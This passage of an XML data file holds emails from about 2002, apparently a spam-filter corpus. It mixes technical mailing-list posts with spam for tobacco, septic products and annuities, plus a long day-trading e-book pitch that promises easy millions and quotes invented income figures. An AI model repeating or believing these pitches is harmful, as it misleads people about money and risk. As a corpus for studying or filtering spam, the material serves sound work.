 bSBvdXIgY3Jpc3AgY2xlYXIgY29ubmVjdGlvbi48YnI+DQogIDxicj4NCiAg
 VG8gYmUgcmVtb3ZlZDogPGEgaHJlZj0ibWFpbHRvOm5vdHRvZGF5QG5ldHNj
 YXBlLm5ldCI+Y2xpY2sgaGVyZTwvYT48L2ZvbnQ+PC9iPjwvZm9udD48L3A+
 DQoNCjA2NzNNRW5vMC0yODVVbGF0NzkyMHV6THY5LTMyOE5UVlY1NzE3YnlH
 VjEtMzg4bDQ0
 ------=_NextPart_000_00D0_65B52D1A.C4816C13--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</si>
  <si>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Toddler falls from a first-storey window, saved from injury by
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8398676,1717/
 Date: 2002-09-30T16:15:15+01:00
 [IMG: http://www.newsisfree.com/Images/fark/iol.gif ([IOL])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Mossberg on 'ChoiceMail': "In my tests, it cut my spam to zero."
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:49 AM 7/24/02 +0200, Eugen Leitl wrote:
 &gt;On Tue, 23 Jul 2002, Mike Masnick wrote:
 &gt;
 &gt;&gt; Lately, a fairly large % of the spam I've been getting has been coming
 &gt;&gt; from spam systems that forge my own address as the "from" address...
 &gt;
 &gt;Include a random token with an expiration date with anything you send.  
 &gt;Valid whitelisting of From:you@here.net yet invalid random token would get 
 &gt;blocked.
 Adds to the level of annoyance, and makes it even less likely that I'll
 ever use it.
 &gt;&gt; Those spam messages would get through any whitelist I set up
 &gt;&gt; (especially since I email stuff to myself all the time).  If
 &gt;&gt; whitelists become more popular, I imagine spammers will resort to
 &gt;&gt; doing that for the majority of their spams, making whitelists less
 &gt;&gt; helpful.
 &gt;
 &gt;Spammers cannot be bothered to keep track if individual whitelists 
 &gt;associated with a given email address.
 They don't have to.  All they have to do is use some program (which, if
 they don't exist already, will certainly be around someday soon) that makes
 every spam they send show the recipient as the "from" address as well.
 &gt;&gt; Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so
 &gt;&gt; special that people should need to fill out a special form just to send me
 &gt;
 &gt;Of course you populate your whitelist with contents of your inbox minus 
 &gt;spam, and then add manually stuff from your addressbook.
 The adding manually thing doesn't seem like much fun.  And, anytime I speak
 to someone new, it just makes it more unlikely that they will be willing to
 contact me.  Having played around with whitelists in the past, you'd be
 amazed at how confused many people get by them as well.  They tend to
 ignore the "please apply" messages.
 As an aside, am I the only person around who simply does not use the
 addressbook feature in email programs?  I never have, and I don't see any
 reason to.  It (along with not opening attachments) has helped me not to
 send out viruses to people.  I generally use my own brain or my inbox as an
 addressbook, and search out the last email I received from someone and hit
 reply...
 &gt;&gt; email.  I could see certain friends of mine getting fairly annoyed
 &gt;&gt; (especially those with multiple email addresses...).
 &gt;
 &gt;What's the point of multiple email addresses? They're a pain.
 Well, yes.  *I* use one email address, but that doesn't mean all my friends
 do.  You would need to convince everyone I know of that.  Most people I
 know, at the very least, have a home and work email address.  But plenty
 others have other addresses for various reasons.  Keeping track of all of
 them for a whitelist seems like a pain.  It forces them to remember which
 email addresses are already approved and avoid using others.
 Plus, I know plenty of people who change jobs, and suddenly get a new email
 address from their new job.  Wouldn't it suck if, in sending out your new
 job info, you had to fill out a new application for each friend just to
 tell them about your new job email address?
  -Mike
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: Can't call method "log" with SA/Razor2
</t>
  </si>
  <si>
    <t xml:space="preserve">This is happening due to insufficient write access to the
 "razor-agent.log" file. I was getting the same error, but
 only as a non-root user.  As a quick workaround, you can do
 "chmod go+w razor-agent.log".
 In Agent.pm, when then the Logger object is created, it
 doesn't check whether the logfile is writable by the current
 user. Then, when a write attempt is made, it bails out with
 the "unblessed reference" error.
 Hope that helps,
 Michael
 &gt; I just noticed the following log entries in my syslog with the latest
 &gt; Spamassassin CVS (set up using spamc/spamd) and razor-agents 2.14:
 &gt;
 &gt; Jul 26 17:30:09 timmy spamd[54928]: razor2 check skipped: No such file or
 &gt; directory Can't call method "log" on unblessed reference at
 &gt; /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Agent.pm line 211,
 &gt; &lt;STDIN&gt; line 25.
 &gt;
 &gt; I saw this after checking if my upgrade from razor-agents 2.12 to 2.14 went
 &gt; okay, but the problem is still there after downgrading back to 2.12.  I
 &gt; don't really know when this started happening, :-/
 &gt;
 &gt; Any ideas on the problem?
 &gt;
 &gt; - Robert
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Discount Fags
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam
 If you are fed up of being 'ripped off' by the British government every time you buy your tobacco, then you should visit our website, where you can now buy 4 cartons of cigarettes, or 40 pouches of rolling tobacco from as little as 170 Euros (approx 105 pounds), inclusive of delivery by registered air mail from our office in Spain.  
 Why pay more???
 Visit our website at
 http://www.smokesdirect.com/?ID=2
 Best regards
 Sales Department
 Smokes Direct
 Spain
 xay2095811y
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Using Normal IDE Device with a Dell Latitude CPx laptop
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 27, 2002 at 11:38:00PM +0100, Vincent Cunniffe mentioned:
 &gt; There is absolutely no way to use a conventional 3.5" drive with a
 &gt; laptop directly. However, you can get an external firewire or USB
 &gt; cradle and attach it to the laptop like that, and any 3.5" drive
 &gt; will work in that case.
  Ah, they told me that about my A1200. Just got a video box, cut air holes
 and a hole for the cables, then got an extra-long 2.5" to 3.5" IDE cable,
 and connected it up. Had to make a few holes in the A1200 case for the
 IDE cable too.
  Worked a charm. Until I dropped the disk one day onto concrete.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Helpful Septic Tank Information 1111BUho3-485kzvl3295UeXZ5-901JGl30
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D1_42B32C7D.B8655D52
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SWYgeW91ciBob21lIGlzIHNlcnZlZCBieSBhIHNlcHRpYyBzeXN0ZW0sIHlv
 dSB3aWxsIGJlIGFibGUgdG8gcmVjZWl2ZQ0KaW52YWx1YWJsZSBpbmZvcm1h
 dGlvbiBvbiBob3cgdG8gZWxpbWluYXRlIHB1bXAgb3V0cywgbWFpbnRhaW4g
 dGhlDQpzeXN0ZW0gcHJvcGVybHkgYW5kIGN1cmUgcHJvYmxlbXMgc3VjaCBh
 cyBiYWNrdXBzLCB3ZXQgc3BvdHMsIG9kb3IsIGV0Yy4NCg0KWW91IGNhbiBk
 byB0aGlzIGJ5IGNoZWNraW5nIG91dCBvdXIgU1BDIHByb2dyYW0gYXQ6DQoN
 Cmh0dHA6Ly93d3cuYmxhY2tzbm93Y2xvdWQuY29tDQoNCkluIGFkZGl0aW9u
 LCB5b3Ugd2lsbCBoYXZlIHRoZSBvcHBvcnR1bml0eSB0byBwYXJ0aWNpcGF0
 ZSBpbiBhIGZyZWUNCnRyaWFsIHRvIHRlc3QgdGhlIGVmZmVjdGl2ZW5lc3Mg
 b2YgU1BDLg0KDQpQbGVhc2UgY2hlY2sgdXMgb3V0Lg0KDQpUaGFuayB5b3Uu
 DQoNClNpbmNlcmVseSwNCg0KU1BDDQoNClAuUy4gUmVtZW1iZXIsIHlvdSBt
 dXN0IGNsaWNrIG9uIHRoaXMgbGluayB0byByZWNlaXZlIHRoaXMgaGVscGZ1
 bA0KaW5mb3JtYXRpb24hDQoNCmh0dHA6Ly93d3cuYmxhY2tzbm93Y2xvdWQu
 Y29tDQoNCg0KDQpUbyBiZSByZW1vdmVkIGZyb20gb3VyIGVtYWlsIGxpc3Qg
 cGxlYXNlIGNsaWNrIG9uIHRoZSBsaW5rIGJlbG93Lg0KaHR0cDovL3d3dy5i
 bGFja3Nub3djbG91ZC5jb20vcmVtb3ZlLmh0bWwNCg0KNzEyM3JLUko5LTI4
 NHpvV1Q5MzIyT1FKcDktMTg3TUNXbzg4NzhWWmxKNy0zNzl5bDQ1DQo=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Flight to Safety is Upon Us
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1C4C0F_01C25CD8.5682CFE0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  That's Not Rush Hour Traffic...
  It's The 'Flight To Safety'!	
 Fixed and indexed annuities are being bought in record numbers, as both
 savers and investors seek strong guarantees and greater upside earnings
 potential from financially strong companies. 	
 October is the biggest month for CD rollovers and most CDs will roll for
 one reason ... HABIT! Give your clients a better alternative and take
 advantage of this window of opportunity! 	
  Respond Today...and Receive a Free CD Replacement Kit	 call
 800-445-6914	
   _____  
  	1st APPLICATION BONUS
 FREE Digital Camera to Capture 
 Those Precious Memories!! 	
 Please fill out the form below to receive a FREE Replacement CD Kit
 Name:	 	 
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	  	
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_1C4C0F_01C25CD8.5682CFE0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The Flight to Safety is Upon Us&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;=20
   &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#003399"&gt;
     &lt;tr&gt;=20
       &lt;td&gt;=20
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/tps/top2.jpg" =
 width=3D"550" height=3D"96" alt=3D"That's Not Rush Hour Traffic..."&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/tps/mid.jpg" width=3D"550" =
 height=3D"95" alt=3D"It's The 'Flight To Safety'!"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"201" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/tps/copter.jpg" width=3D"214" =
 height=3D"78"&gt;&lt;/td&gt;
             &lt;td width=3D"349"&gt;&lt;br&gt;
               &lt;font face=3D"Georgia, Times New Roman, Times, =
 serif"&gt;Fixed and indexed=20
               annuities are being bought in record numbers, as both =
 savers and=20
               investors seek strong guarantees and greater upside =
 earnings potential=20
               from financially strong companies.&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"6"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;font face=3D"Georgia, Times New Roman, Times, =
 serif"&gt;&lt;br&gt;
               October is &lt;b&gt;&lt;font color=3D"#993333"&gt;the biggest =
 month&lt;/font&gt;&lt;/b&gt;=20
               for CD rollovers and most CDs &lt;b&gt;&lt;font =
 color=3D"#990000"&gt;will&lt;/font&gt;&lt;/b&gt;=20
               roll for one reason ... &lt;b&gt;&lt;font =
 color=3D"#993333"&gt;HABIT!&lt;/font&gt;&lt;/b&gt;=20
               Give your clients a better alternative and take advantage =
 of this=20
               window of opportunity!&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"374" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/tps/repond.gif" width=3D"348" height=3D"174" =
 alt=3D'Respond Today...and Receive a Free CD Replacement Kit'&gt;&lt;/td&gt;
             &lt;td width=3D"176" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/tps/cd.jpg" width=3D"162" height=3D"174" =
 alt=3D'call 800-445-6914'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;hr&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"157" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/tps/camera.jpg" width=3D"88" =
 height=3D"72"&gt;&lt;/td&gt;
             &lt;td width=3D"377" align=3D"center"&gt;
               &lt;b&gt;&lt;font face=3D"Times New Roman, Times, serif"&gt;&lt;font =
 color=3D"#003399"&gt;1st APPLICATION BONUS&lt;/font&gt;&lt;br&gt;
               FREE Digital Camera to Capture &lt;br&gt;
               Those Precious Memories!!&lt;/font&gt;&lt;/b&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/tps/logo.gif" width=3D"277" =
 height=3D"47"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#003399"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Georgia, Times New Roman, Times, serif" size=3D"2" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;Please fill out the form below to receive a FREE =
 Replacement CD Kit&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                           &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/q2.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                             &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"sales@tpsbrokerage.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"TPS Ad Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"1"&gt;We=20
                 don't want anybody to receive our mailing who does not =
 wish to=20
                 receive them. This is a professional communication sent =
 to insurance=20
                 professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
                 to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;http://www.insuranceiq.com/op=
 tout&lt;/a&gt;&lt;br&gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
               &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;br&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1C4C0F_01C25CD8.5682CFE0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Apt problems
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Feb 06, 2002 at 04:14:27PM +0100, Matthias Saou wrote:
 &gt; Strange... all my openssh packages don't explicitly requires a version of
 &gt; openssl. What version of openssh do you have? Is it an official Red Hat
 &gt; package? I suppose it isn't, and using Red Hat's rpms will solve your
 &gt; problem.
 openssh-3.0.2p1-1
 I think that is directly from openssh site. It's from the RH 6.2 that I 
 upgraded to 7.2 (6.2 doesn't ship with openssh...). 
 I probably should downgrade to the versoin RH provides except I can't do 
 that as I don't have physical access to that box and downgrading ssh 
 packages over ssh doesn't sound like a bright idea...
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Adam L. Beberg wrote:
 &gt; Battery pack, huh what???
 &gt; 
 &gt; You dont use batteries for a 1/4 mile run, you use capacitors. MANY times
 Actually, you use both.
 &gt; the energy density, and you can get the energy out fast enough. Note that
 No, even best supercapacitors are a long way to go from reasonably good 
 electrochemical energy sources. But you can recharge and discharge them 
 very quickly, and they take lots more of cycles than the best battery. 
 Ideal for absorbing the braking energy and turn them into smoking tires 
 few moments or minutes afterwards.
 &gt; the battery packs are fully swapped out for recharging after each run
 &gt; anyway, just like a gas dragster is refueled, so this wouldnt be cheating.
 &gt; 200 MPH should be no problem.
 I don't see any reason why EVs shouldn't dominate dragster runs. The
 traction is the limiting factor, not motor power. You can basically put
 the motors into wheelhubs mounted on a composite frame, and dump juice
 into them until they melt, which will be some 100 sec downstream. Plenty
 of time to smoke anything.
 Of course, it doesn't roar, and spew smokage, so it won't happen.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Seconds to date?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Sep 01, 2002 at 04:14:17PM +0100, Paul Jakma mentioned:
 &gt; On Sun, 1 Sep 2002, kevin lyda wrote:
 &gt; 
 &gt; &gt; gnu date is limited by time_t.  but i thought time_t expired in 2037?
 &gt; &gt; this seems to show it expiring in 2038:
 &gt; 
 &gt; (2^31-1)/3600/24/365+1970
 &gt; 2038
 &gt; 
 &gt; course, on UltraSparc, x86-64, IA64, alpha, etc:
 &gt; 
 &gt; (2^63-1)/3600/24/365+1970
 &gt; 292471210647
 &gt; 
 &gt; so we should be safe enough.
  May I assume that x86-64 will be able to use a 64bit time_t too? 
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Peter wrote :
 &gt; On Wed, Feb 06, 2002 at 04:14:27PM +0100, Matthias Saou wrote:
 &gt; &gt; Strange... all my openssh packages don't explicitly requires a version
 &gt; &gt; of openssl. What version of openssh do you have? Is it an official Red
 &gt; &gt; Hat package? I suppose it isn't, and using Red Hat's rpms will solve
 &gt; &gt; your problem.
 &gt; 
 &gt; openssh-3.0.2p1-1
 &gt; 
 &gt; I think that is directly from openssh site. It's from the RH 6.2 that I 
 &gt; upgraded to 7.2 (6.2 doesn't ship with openssh...). 
 That explains...
 &gt; I probably should downgrade to the versoin RH provides except I can't do 
 &gt; that as I don't have physical access to that box and downgrading ssh 
 &gt; packages over ssh doesn't sound like a bright idea...
 Well, with 7.0, I've seen a few problems with doing that, but as of 7.2
 it's really wonderful! Ever tried of completely uninstalling all openssh
 related packages while being connected through ssh? Well, it works!!!! Of
 course, if the connection cuts at that moment, you're stuck, but a simple
 upgrade with official Red Hat packages also works like a charm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</si>
  <si>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[Spambayes] Ditching WordInfo
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Guido van Rossum &lt;guido@python.org&gt; is all like:
 &gt; Maybe.  I batch messages using fetchmail (don't ask why), and adding
 &gt; .4 seconds per message for a batch of 50 (not untypical) feels like a
 &gt; real wait to me...
 Yeesh.  Sounds like what you need is something to kick up once and score
 an entire mailbox.
 Wait a second...  So *that's* why you wanted -u.
 If you can spare the memory, you might get better performance in this
 case using the pickle store, since it only has to go to disk once (but
 boy, does it ever go to disk!)  I can't think of anything obvious to
 speed things up once it's all loaded into memory, though.  That's
 profiler territory, and profiling is exactly the kind of optimization
 I just said I wasn't going to do :)
 Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earn $139,000 a year as a DAY TRADER!
</t>
  </si>
  <si>
    <t xml:space="preserve">It was the Spring of 1979.  
 I was just a tall, goofy looking kid in middle school
 with buck-teeth and freckles.  Each day in the
 cafeteria, I walked from table to table ...
 Stealing other kids' lunch money.
 No, I didn't rob them with a gun or a knife - I just made
 them a little deal.  "Let me borrow two dollars today," I said,
 "and I'll bring you five dollars next week."  The investment
 was too good to pass up, and other kids were throwing their
 lunch money at me like gravy on mashed potatoes.  Of course 
 when "next week" rolled around and I couldn't pony up the cash,
 I promised to pay them even more the week after that,
 if they would just let me keep their investment a little bit 
 longer.
 Eventually the end of the year came and went, high school
 started and with it came girls, and homework, and parties,
 and sports, and those poor kids from eighth grade had more 
 things on their mind than last year's lunch money.
 I made off with a tidy sum for a middle school kid,
 and I didn't even get beat up.
 Hidden inside this story are the two greatest stock market 
 secrets you will ever learn.
 First of all, greed is your number one enemy. You're not
 going to turn $2 into $5 in a week, so cash out when
 you're ahead.  Don't wait for the boat to sink before 
 grabbing the lifejacket.
 Second, never trust an investment adviser of any kind.
 They are looking out for their own money, not yours.
 The "professionals", those stuffy investment counselors and
 money managers, will always tell you that the best time to
 buy is NOW.  According to those guys, the longer you keep
 your money in the market, the more money you're going to make.
 Ask them when is the best time to sell and their answer is
 "NEVER".  
 In a sense, they are right.  If you put $250,000 in an index
 fund right now, you'll probably have over a million dollars
 in thirty or forty years.  But here's the problem:
 Do you want to WAIT thirty or forty years to be rich?
 Hell no!
 You want the money NOW - so you can enjoy it. It's hard to
 make use of your fortune when you're seventy years old 
 in a wheelchair.  If you could make a million dollars in
 the next few years, what would you do with it?  Where would
 you travel?  What kind of car would you buy?  
 The fact is ... youth is the best time to be rich.
 If your goal is to make quick profits in the market, volatility
 is your ally, and stability your enemy.  You want to see
 those large upswings, two hundred points in a day, followed
 by the four hundred point crash a week later.  You don't
 care if the market went up or down 20% this year as long
 it was UNSTABLE.  That's how you're going to make the 
 money.
 What I'm talking about here is day trading.  
 My father invests the traditional way; he holds some good stocks 
 and he goes up 30K and down 30K. In the long term of 5-10 years 
 he makes money. 
 The day trader buys or sells 5,000 shares of XYZ for a
 $25,000 profit in a 5-10 minute trade.  He acts quickly, taking 
 advantage of all the information at his disposal about a 
 certain stock, and estimating whether it will go up or 
 down within hours, sometimes within minutes.  
 I can teach you how to do this - and how to make amazing 
 amounts of money at it.  It's not rocket science, and you 
 only need to learn a few basic principles to get started.
 Society would have you believe that successful trading is 
 complicated and requires formal training.  
 The truth is, wealthy people use very simple investment 
 strategies to make money.  
 Popular media and investment professionals portray successful
 trading as difficult and complex to scare you out of the boxing
 ring.  They don't want the competetion - and they sure as hell
 don't want you paying a few dollars to an online trading firm
 to execute a trade for which they'd charge you forty or fifty 
 dollars.
 They make their money only if you believe two lies:
 1) That investing is too difficult and risky for the average 
 person.
 2) That using an investment adviser who charges a high 
 commission is safer than trading online for a few bucks 
 per trade.
 Here is what the financial gurus in today's society absolutely,
 positively DO NOT WANT YOU TO KNOW ...
 The strategies for profitable day trading are in fact
 so simple that anyone can do it - provided they spend
 a few hours of studying.  
 After reading over 200 financial books and publications
 during the past decade, and after using day trading
 to successfully make more than four million dollars in
 the stock market, I've learned the following lessons:
 ** Achieving financial success is incredibly simple.
 ** Anyone can do it.
 ** It only takes a few hours to learn.
 When I discovered the secret to day trading, I didn't become
 wealthy overnight.  If you want instant cash, drive to Wal-mart. 
 Buy a ski mask and a shotgun, and rob your local bank. The 
 only way to get rich, quick or otherwise, is through
 hard work, knowledge, and determination.
 After learning the fundamentals of day trading, I started 
 practicing the trading art itself, and the first few weeks
 brought modest gains.  The next few months gave me the practical
 experience I needed to really earn a living, and I was pulling
 close to a six figure income. In less than three years with no 
 formal financial training, minimal effort and only moderate risk,
 I had made my first million.  The knowledge that I gained 
 during those formative trading years I am willing to share
 with you in my new book, the Master Trader.  You will learn from
 my mistakes, and from my successes, as I teach you the simple,
 secret formula for day trading that I've used profitably
 year after year.
 The income of the day trader can be staggering.  Thousands, even 
 hundreds of thousands of dollars can be made or lost within
 minutes.  The difference between making money and losing your 
 shirt is simply this: knowledge.  I will provide that knowledge,
 and I will give you a winning edge at this high-stakes game. 
 Average Income of a Day Trader: 
 5% average an income in excess of $500,000 per year
 22% average an income in excess of $250,000 per year
 35% average an income in excess of $100,000 per year. 
 27% average an income between $50,000 and $99,999 per year 
 11% average an income between $20,000 and $49,999 per year 
 After reading the Master Trader, you will discover extremely 
 profitable, simple yet powerful trading methods that give 
 you an almost unfair trading advantage and make you 
 win DESPITE the current market weakness. 
 Here is just a snippet of what I will teach you:
 *** Make money whether a stock goes up or down.
 *** Learn how to get in and out of stocks within split seconds.
 *** Learn exactly what stocks to trade, the exact price to 
 buy them and the exact price to sell them. 
 *** Save thousands of dollars by learning to avoid the 
 mistakes beginners make.
 *** Learn how to trade stocks like a pro and how to make money 
 consistently in every market! 
 *** Learn proven strategies that give you the highest chance 
 for great success. 
 *** Profit on huge intraday price swings.
 *** Make money on the biggest news stories.
 *** Actively manage your risks and learn how to realize maximum
 returns. 
 *** Learn how to use the tools and information Wall Street 
 professionals use.
 *** Learn how to develop and maintain a winning state of mind. 
 It's time to ask yourself: "Am I going to listen to the 
 Professionals who say BUY BUY BUY but never sell?  Or am
 I going to take control of my own financial future, and
 start making money RIGHT NOW in the stock market?"
 Who is looking out for your best economic interests - some
 wealthy Wall Street stockbroker, or yourself?
 With the Master Trader e-book, you will learn everything you 
 need to know in order to get started with Day Trading ... from 
 choosing the best broker in order to take advantage of the 
 lowest commissions and instant order executions to professional 
 trading strategies that make professional traders millions of 
 dollars.
 The Master Trader e-book is the most comprehensive yet easy to 
 understand and straight-forward book ever written about active 
 trading. If you are serious about success in short term stock 
 trading - ORDER TODAY and start paving the road to your
 own financial future.
 Oh, and remember that scraggly kid in the eighth grade?
 His high school friends laughed when he said he was going to 
 make money in the stock market.  
